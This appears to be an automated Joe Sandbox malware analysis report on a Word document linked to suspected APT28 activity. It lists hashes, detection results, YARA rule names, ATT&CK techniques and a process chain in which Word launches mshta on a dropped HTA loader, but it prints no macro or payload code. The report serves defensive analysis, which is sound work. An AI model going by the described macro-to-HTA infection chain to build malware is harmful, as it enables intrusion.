Windows
Analysis Report
40#U0433.doc
Overview
General Information
Sample name: | 40#U0433.docrenamed because original name is a hash value |
Original sample name: | 16-09-2024 .doc |
Analysis ID: | 1590275 |
MD5: | afe03893b7a5c589fc31f9ce9ed28a9f |
SHA1: | 8af5ac1b7432290e6070cf6d27a3a808db4a45b3 |
SHA256: | e440bad60823642e8976528bd450364ce2542d15a69778ff20996eb107158b8d |
Tags: | docUAC-0063user-smica83 |
Infos: | |
Detection
Score: | 92 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
- System is w11x64_office
- appidpolicyconverter.exe (PID: 7656 cmdline:
"C:\Window s\system32 \appidpoli cyconverte r.exe" MD5: 6567D9CF2545FAAC60974D9D682700D4) - conhost.exe (PID: 7708 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 9698384842DA735D80D278A427A229AB)
- WINWORD.EXE (PID: 8076 cmdline:
"C:\Progra m Files\Mi crosoft Of fice\Root\ Office16\W INWORD.EXE " /Automat ion -Embed ding MD5: A9F0EC89897AC6C878D217DFB64CA752)
- WINWORD.EXE (PID: 6632 cmdline:
"C:\Progra m Files\Mi crosoft Of fice\Root\ Office16\W INWORD.EXE " /Automat ion -Embed ding MD5: A9F0EC89897AC6C878D217DFB64CA752)
- mshta.exe (PID: 688 cmdline:
"C:\Window s\System32 \mshta.exe " C:\Users \user\AppD ata\Local\ Settings\l ocale MD5: 36D15DDE6D71802D9588CC0D48EDF8EA)
- cleanup
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
apt_susp_apt28_uac0063_malicious_doc_settings_xml | Detects some suspected APT28 document settings.xml | Sekoia.io |
|
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
apt_susp_apt28_uac0063_hta_loader | Detects some suspected APT28 HTA loader | Sekoia.io |
|
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
apt_susp_apt28_uac0063_hta_loader | Detects some suspected APT28 HTA loader | Sekoia.io |
| |
apt_susp_apt28_uac0063_hta_loader | Detects some suspected APT28 HTA loader | Sekoia.io |
|
Click to jump to signature section
AV Detection |
---|
Source: | Avira: |
Source: | Virustotal: | Perma Link | ||
Source: | ReversingLabs: |
Source: | Joe Sandbox ML: | ||
Source: | Joe Sandbox ML: | ||
Source: | Joe Sandbox ML: |
Source: | Joe Sandbox ML: |
Source: | File opened: | Jump to behavior |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
System Summary |
---|
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: |
Source: | OLE, VBA macro line: | |||
Source: | OLE, VBA macro: | Name: documeNt_opEn | ||
Source: | OLE, VBA macro line: | |||
Source: | OLE, VBA macro line: | |||
Source: | OLE, VBA macro line: | |||
Source: | OLE, VBA macro line: | |||
Source: | OLE, VBA macro line: | |||
Source: | OLE, VBA macro line: |
Source: | OLE, VBA macro: |
Source: | COM Object queried: | Jump to behavior |
Source: | OLE, VBA macro line: | |||
Source: | OLE, VBA macro: | Name: documeNt_opEn | ||
Source: | OLE, VBA macro line: | |||
Source: | OLE, VBA macro line: | |||
Source: | OLE, VBA macro line: | |||
Source: | OLE, VBA macro line: | |||
Source: | OLE, VBA macro line: | |||
Source: | OLE, VBA macro line: | |||
Source: | OLE, VBA macro line: | |||
Source: | OLE, VBA macro line: | |||
Source: | OLE, VBA macro line: | |||
Source: | OLE, VBA macro line: | |||
Source: | OLE, VBA macro line: | |||
Source: | OLE, VBA macro line: | |||
Source: | OLE, VBA macro line: | |||
Source: | OLE, VBA macro line: | |||
Source: | OLE, VBA macro line: | |||
Source: | OLE, VBA macro line: | |||
Source: | OLE, VBA macro line: | |||
Source: | OLE, VBA macro line: | |||
Source: | OLE, VBA macro line: | |||
Source: | OLE, VBA macro line: |
Source: | OLE indicator, VBA macros: | ||
Source: | OLE indicator, VBA macros: | ||
Source: | OLE indicator, VBA macros: | ||
Source: | OLE indicator, VBA macros: | ||
Source: | OLE indicator, VBA macros: |
Source: | Key opened: | Jump to behavior |
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: |
Source: | Classification label: |
Source: | File created: | Jump to behavior |
Source: | Mutant created: | ||
Source: | Mutant created: |
Source: | File created: | Jump to behavior |
Source: | OLE indicator, Word Document stream: | ||
Source: | OLE indicator, Word Document stream: | ||
Source: | OLE indicator, Word Document stream: | ||
Source: | OLE indicator, Word Document stream: | ||
Source: | OLE indicator, Word Document stream: |
Source: | OLE document summary: | ||
Source: | OLE document summary: | ||
Source: | OLE document summary: | ||
Source: | OLE document summary: | ||
Source: | OLE document summary: | ||
Source: | OLE document summary: | ||
Source: | OLE document summary: | ||
Source: | OLE document summary: | ||
Source: | OLE document summary: |
Source: | File read: | Jump to behavior |
Source: | Key opened: | Jump to behavior |
Source: | Virustotal: | ||
Source: | ReversingLabs: |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior |
Source: | Key value queried: | Jump to behavior |
Source: | Key opened: | Jump to behavior |
Source: | Window found: | Jump to behavior |
Source: | Window detected: |
Source: | Key opened: | Jump to behavior |
Source: | File opened: | Jump to behavior |
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior |
Malware Analysis System Evasion |
---|
Source: | OLE, VBA macro: | Name: rundoc |
Source: | Stream path 'VBA/ThisDocument' : | |||
Source: | OLE, VBA macro: | Name: documeNt_opEn | ||
Source: | Stream path 'VBA/ThisDocument' : | |||
Source: | Stream path 'VBA/ThisDocument' : |
Source: | Process information queried: | Jump to behavior |
Source: | Key value queried: | Jump to behavior |
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Gather Victim Identity Information | 42 Scripting | Valid Accounts | Windows Management Instrumentation | 42 Scripting | 1 Process Injection | 1 Masquerading | OS Credential Dumping | 1 Security Software Discovery | Remote Services | 1 Email Collection | Data Obfuscation | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
Credentials | Domains | Default Accounts | Scheduled Task/Job | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Process Injection | LSASS Memory | 1 Process Discovery | Remote Desktop Protocol | Data from Removable Media | Junk Data | Exfiltration Over Bluetooth | Network Denial of Service |
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 1 DLL Side-Loading | Security Account Manager | 1 File and Directory Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | Steganography | Automated Exfiltration | Data Encrypted for Impact |
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | Binary Padding | NTDS | 4 System Information Discovery | Distributed Component Object Model | Input Capture | Protocol Impersonation | Traffic Duplication | Data Destruction |
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
41% | Virustotal | Browse | ||
34% | ReversingLabs | Script-WScript.Trojan.MacrosBomber | ||
100% | Avira | VBA/AVI.Obfuscated.hgyul | ||
100% | Joe Sandbox ML |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
100% | Joe Sandbox ML | |||
100% | Joe Sandbox ML | |||
100% | Joe Sandbox ML |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|---|
edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | 84.201.210.39 | true | false | high |
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown |
Joe Sandbox version: | 42.0.0 Malachite |
Analysis ID: | 1590275 |
Start date and time: | 2025-01-13 21:34:12 +01:00 |
Joe Sandbox product: | CloudBasic |
Overall analysis duration: | 0h 5m 14s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Cookbook file name: | defaultwindowsofficecookbook.jbs |
Analysis system description: | Windows 11 23H2 with Office Professional Plus 2021, Chrome 131, Firefox 133, Adobe Reader DC 24, Java 8 Update 431, 7zip 24.09 |
Run name: | Potential for more IOCs and behavior |
Number of analysed new started processes analysed: | 25 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Sample name: | 40#U0433.docrenamed because original name is a hash value |
Original Sample Name: | 16-09-2024 .doc |
Detection: | MAL |
Classification: | mal92.expl.evad.winDOC@7/16@0/0 |
EGA Information: | Failed |
HCA Information: |
|
Cookbook Comments: |
|
- Exclude process from analysis (whitelisted): MpCmdRun.exe, SecurityHealthHost.exe, dllhost.exe, sppsvc.exe, RuntimeBroker.exe, ShellExperienceHost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
- Excluded IPs from analysis (whitelisted): 2.23.242.162, 4.175.87.197, 20.190.159.0
- Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, slscr.update.microsoft.com, login.live.com, ctldl.windowsupdate.com.delivery.microsoft.com, ctldl.windowsupdate.com, wu-b-net.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
- Not all processes where analyzed, report is missing behavior information
- Report size exceeded maximum capacity and may have missing behavior information.
- Report size getting too big, too many NtCreateFile calls found.
- Report size getting too big, too many NtOpenKeyEx calls found.
- Report size getting too big, too many NtProtectVirtualMemory calls found.
- Report size getting too big, too many NtQueryAttributesFile calls found.
- Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description |
---|---|---|
21:38:17 | Task Scheduler |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | Get hash | malicious | Unknown | Browse |
| |
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Vidar | Browse |
| ||
Get hash | malicious | HTMLPhisher | Browse |
| ||
Get hash | malicious | HTMLPhisher | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | HTMLPhisher | Browse |
|
Process: | C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 3402 |
Entropy (8bit): | 5.599930323764607 |
Encrypted: | false |
SSDEEP: | 48:dwm4wQ97qgOtXFYQqHyyzpE3bM0B04SAmRE7SahsOpjRCZ7/M67Sg1I0qC:WwQ9E2QE43YINF3psOl8Z/5P1I0qC |
MD5: | 88F2752BD67FA632DF940B52E38254BD |
SHA1: | 5E671630EACC842379EF09DCF57571E4CEED9574 |
SHA-256: | 3EB696345C147D924A0407E37143C44E8BE3563EFA23EEC914E6C9ACEE3F2BEB |
SHA-512: | 7DDEBC720824F03E7693EFF42E7D1FED5C2FF6DC28F9A39E87123A56474649C1E9FE07FF2FCC1CEC10614546BD2EFC3A725D3A086100B0D451F6D0078E344EF2 |
Malicious: | false |
Yara Hits: |
|
Reputation: | low |
Preview: |
Process: | C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE |
File Type: | |
Category: | modified |
Size (bytes): | 1148 |
Entropy (8bit): | 2.716960418943582 |
Encrypted: | false |
SSDEEP: | 24:VIXRZatKr3RIotD0quyFkKdpeXKGnyEi+uYyPjXzVAmrqpWpUOrv:ViCK36otgquidpeXbniYyPjB9WYpP |
MD5: | 58ED5182076081B1EEE9E1E950C49713 |
SHA1: | 06393735181E361FAD7CB5F2DBA4F4B7AA821B25 |
SHA-256: | 3F65A4A66029DB62197907E7DDDDEE12442E6DAFDE3104D8FAD1CE00E289F7C6 |
SHA-512: | D569191F922B11F4007CEA157B9A0A16AA33307F92722BA9D331D391B235177B921447DB5064C2C29B67044D60D1E8E5492BE46895A39AE10BA8483276CF7928 |
Malicious: | false |
Reputation: | low |
Preview: |
Process: | C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 22275 |
Entropy (8bit): | 7.594783952663905 |
Encrypted: | false |
SSDEEP: | 384:/i+n6XtwyM/zeqzzzNxt/ZtNNjx3KmEOTRwwLb5MB7ha/9Q4kvaQvGwKij:/B6d7Aze8lxllNjom5wwLtys92Hr |
MD5: | 214513CA29E10F2AFF14A45A5C72DCDF |
SHA1: | 72DDD82FD8F845FC3BB0EA27AD081C77EB4F0013 |
SHA-256: | BE17BE2BB898626B1F3DC3AE8BA4A038C98952FA81F9F6F936AB634CB9440F0D |
SHA-512: | 1D709638D689CF5FEA6BAEA831826A9B697BA0C27D8C18D852D0EB7DFC10FC6F2F125A4B2C7CE2B9012761F3CEF68BA5E8EB65260719AB4A668EDB76E765031B |
Malicious: | true |
Reputation: | low |
Preview: |
Process: | C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 812 |
Entropy (8bit): | 2.7223597372446555 |
Encrypted: | false |
SSDEEP: | 24:BrIZatKVUr0quyFLdpeXKzzykyYyPjJxpe20:9fCUYqugdpeXRYyPjJxpe5 |
MD5: | D1683B0BC08CE8833B3C780FFF2785B5 |
SHA1: | 14BE2D116989DA4A5790D24F4D87AE506EB1871D |
SHA-256: | 51B7B848296F273B969C4A94941DD9B52E774E016FA2120B7B081D29F7C83564 |
SHA-512: | 0278BCE568B05EF5266FC880AC32925B0E4164C0C7B4029441D28C80B5C496052A40A0BB8905DC348B9B101E62C7BBFA13B22101CE54BC5199AA5A933F578F8D |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 663 |
Entropy (8bit): | 5.949125862393289 |
Encrypted: | false |
SSDEEP: | 12:PlrojAxh4bxdtT/CS3wkxWHMGBJg8E8gKVYQezuYEecp:trPsTTaWKbBCgVqSF |
MD5: | ED3C1C40B68BA4F40DB15529D5443DEC |
SHA1: | 831AF99BB64A04617E0A42EA898756F9E0E0BCCA |
SHA-256: | 039FE79B74E6D3D561E32D4AF570E6CA70DB6BB3718395BE2BF278B9E601279A |
SHA-512: | C7B765B9AFBB9810B6674DBC5C5064ED96A2682E78D5DFFAB384D81EDBC77D01E0004F230D4207F2B7D89CEE9008D79D5FBADC5CB486DA4BC43293B7AA878041 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 162 |
Entropy (8bit): | 2.8877867481926813 |
Encrypted: | false |
SSDEEP: | 3:ZaKlP5nKYF/iYF/3/llP//Zk6cuAl/Dxcn:Za+cYF/iYF/3/3//jJLn |
MD5: | C3236856C9B7C29715F24E84CDCCDEBB |
SHA1: | 19966B729BE50C57E36BDF9D3A5C34AFF88AE6B5 |
SHA-256: | B9F150FF1CF521076CED40562809766A90EE2A39FCF199993013B6569AC1863B |
SHA-512: | F7A555C6AD767876C031549C5171C561CF68496092993A4E1967B3B23D38C15560B765397BD01DD3DC703F1E3BD68CC70A72435D079EA00F0039D2EE4707A53F |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 22275 |
Entropy (8bit): | 7.594783952663905 |
Encrypted: | false |
SSDEEP: | 384:/i+n6XtwyM/zeqzzzNxt/ZtNNjx3KmEOTRwwLb5MB7ha/9Q4kvaQvGwKij:/B6d7Aze8lxllNjom5wwLtys92Hr |
MD5: | 214513CA29E10F2AFF14A45A5C72DCDF |
SHA1: | 72DDD82FD8F845FC3BB0EA27AD081C77EB4F0013 |
SHA-256: | BE17BE2BB898626B1F3DC3AE8BA4A038C98952FA81F9F6F936AB634CB9440F0D |
SHA-512: | 1D709638D689CF5FEA6BAEA831826A9B697BA0C27D8C18D852D0EB7DFC10FC6F2F125A4B2C7CE2B9012761F3CEF68BA5E8EB65260719AB4A668EDB76E765031B |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 27363 |
Entropy (8bit): | 7.6972650144562955 |
Encrypted: | false |
SSDEEP: | 768:/B6dYzINNxvAbmOgzmyxllNjio/+ZXd92f:QmzINbImOgzPBQo2x6f |
MD5: | BE56663D63C490BE577D562D46DE9C77 |
SHA1: | 2C9886D5E282DF065492204991CA15C53998862B |
SHA-256: | 1BA710DE9496FBEF5FC32AC6A510ACEC5272C35DBA15E7AC1517821F9A835015 |
